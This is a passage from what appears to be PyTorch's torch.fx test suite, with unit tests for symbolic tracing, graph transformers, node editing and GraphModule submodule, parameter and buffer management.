4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm 
= torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def 
test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_layout(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x): return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0) traced = symbolic_trace(M()) x = torch.rand(5, 9, 3, 4) self.assertEqual(traced(x), torch.zeros_like(x)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] 
traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with 
rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph 
: torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_prepend_self(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.prepend(b) x.append(b) self.assertEqual(len(graph.nodes), 3) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key 
in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(list(x.node.users.keys()), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) 
self.assertEqual(list(x.node.users.keys()), [zed.node]) def test_trace_function(self): def foo(x, y): return torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def 
forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): 
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here 
self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ ["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def 
test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except 
RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = 
ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit] ) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( list(found_targets.keys()), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit] ) def test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def 
to_trace(y):
            return wrapped_via_decorator(y)

        # Tail of a test whose `def` line lies before this chunk: trace a
        # function calling a decorator-wrapped helper and check the wrap
        # survives both tracing and a Transformer round-trip.
        ast_rewriter = RewritingTracer()
        graph = ast_rewriter.trace(to_trace)
        traced = GraphModule(ast_rewriter.root, graph, "gm")

        self.assertIn("wrapped_via_decorator", traced.code)
        self.assertEqual(traced(0), 1)
        self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
        self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))

        transformed = torch.fx.Transformer(traced).transform()
        self.assertIn("wrapped_via_decorator", transformed.code)
        self.assertEqual(transformed(0), 1)
        self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
        self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))

    def test_ast_rewriter_wrap_with_submodule(self):
        """The AST-rewriting tracer keeps a call to a wrapped function that
        takes an nn.Module argument as a single call in the generated code."""
        class M(torch.nn.Module):
            def __init__(self):
                super(M, self).__init__()
                self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)

            def forward(self, x: torch.Tensor):
                return wrapped_with_submodule(x, self.batchnorm1d)

        ast_rewriter = RewritingTracer()
        graph = ast_rewriter.trace(M())
        traced = GraphModule(ast_rewriter.root, graph, "gm")

        self.assertIn("wrapped_with_submodule", traced.code)

        input = torch.rand(3, 2)
        ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
        self.assertEqual(ref_batchnorm1d(input), traced(input))

    def test_submodule_manipulation_API(self):
        """Exercise GraphModule's add/get/delete APIs for submodules,
        parameters and buffers on a three-level module hierarchy."""
        class C(torch.nn.Module):
            def __init__(self):
                super(C, self).__init__()
                self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
                self.param = torch.nn.Parameter(torch.rand(2, 3))

            def forward(self, x):
                return self.conv(torch.cat([self.param, x]))

        class B(torch.nn.Module):
            def __init__(self):
                super(B, self).__init__()
                self.linear = torch.nn.Linear(100, 200)
                self.register_buffer("buf", torch.randn(2, 3))
                self.net_c = C()

            def forward(self, x):
                return self.linear(torch.cat([self.buf, self.net_c(x)]))

        class A(torch.nn.Module):
            def __init__(self):
                super(A, self).__init__()
                self.net_b = B()
                self.param = torch.nn.Parameter(torch.rand(2, 3))

            def forward(self, x):
                return self.net_b(x) + self.param

        a = symbolic_trace(A())

        a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))

        conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
        with a.graph.inserting_before(conv):
            # Inserting a call to a module that exists must not warn.
            with warnings.catch_warnings(record=True) as w:
                dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
                                              args=conv.args)
                self.assertEqual(len(w), 0)

        conv.replace_all_uses_with(dropout)
        a.graph.erase_node(conv)
        a.recompile()

        def module_exists(gm: GraphModule, path: str) -> bool:
            return any(path == name for name, _ in gm.named_modules())

        def parameter_exists(gm: GraphModule, path: str) -> bool:
            return (any(path == name for name, _ in gm.named_parameters())
                    and any(path == name for name in gm.state_dict().keys()))

        def buffer_exists(gm: GraphModule, path: str) -> bool:
            return (any(path == name for name, _ in gm.named_buffers())
                    and any(path == name for name in gm.state_dict().keys()))

        # Test that we added the "dropout" submodule
        self.assertTrue(module_exists(a, "net_b.net_c.dropout"))

        # Test `get_submodule` with an added submodule
        self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))

        # Test that the "conv" submodule is still there
        self.assertTrue(module_exists(a, "net_b.net_c.conv"))

        # Test `get_submodule` with an original module
        self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))

        # Test that the "conv" node is NOT still there
        conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
        self.assertEqual(conv, [])

        a.delete_submodule("net_b.net_c.conv")

        # Test that the "conv" submodule is now gone
        self.assertFalse(module_exists(a, "net_b.net_c.conv"))

        # Test `get_submodule` with a deleted submodule
        with self.assertRaisesRegex(AttributeError, "has no attribute "
                                    "`conv`"):
            self.assertIsNone(a.get_submodule("net_b.net_c.conv"))

        # Test `get_attr` warnings
        cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]

        with a.graph.inserting_before(cat):
            with warnings.catch_warnings(record=True) as w:
                param = a.graph.get_attr(qualified_name="net_b.net_c.param")
                self.assertEqual(len(w), 0)

            # A get_attr to a nonexistent target must warn.
            with self.assertWarnsRegex(UserWarning, "Attempted to "
                                       "insert a get_attr Node with no "
                                       "underlying reference in the "
                                       "owning GraphModule"):
                bad_param = a.graph.get_attr(qualified_name="net_b.param")
                a.graph.erase_node(bad_param)

        cat.args = (*cat.args, param)

        a.recompile()
        a.graph.lint()

        # Test `get_parameter`
        a.get_parameter("net_b.net_c.param")
        with self.assertRaisesRegex(AttributeError, "is not an "
                                    "nn.Parameter"):
            a.get_parameter("net_b.buf")
        with self.assertRaisesRegex(AttributeError, "has no attribute "
                                    "`param`"):
            a.get_parameter("net_b.param")

        # Test `get_buffer`
        a.get_buffer("net_b.buf")
        with self.assertRaisesRegex(AttributeError, "is not a "
                                    "buffer"):
            a.get_buffer("net_b.net_c.param")
        with self.assertRaisesRegex(AttributeError, "has no attribute "
                                    "`buf`"):
            a.get_buffer("net_b.net_c.buf")

        # Test non-nested attributes
        a.get_submodule("")
        a.get_parameter("param")

        # Insert some unused submodules
        a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
        a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
        a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
        a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))

        # Garbage collection
        a.delete_all_unused_submodules()

        # Test that all the unused submodules are gone
        self.assertFalse(module_exists(a, "net_b.embedding"))
        self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
        self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
        self.assertFalse(module_exists(a, "batch_norm_2d"))

        # Test that we didn't delete any unused Parameters or buffers
        self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
        self.assertTrue(buffer_exists(a, "net_b.buf"))

        a.graph.lint()

    def test_delete_unused_submodules_leaf(self):
        """`delete_all_unused_submodules` must keep a module that is only
        referenced as a leaf call_module node (not inlined by tracing)."""
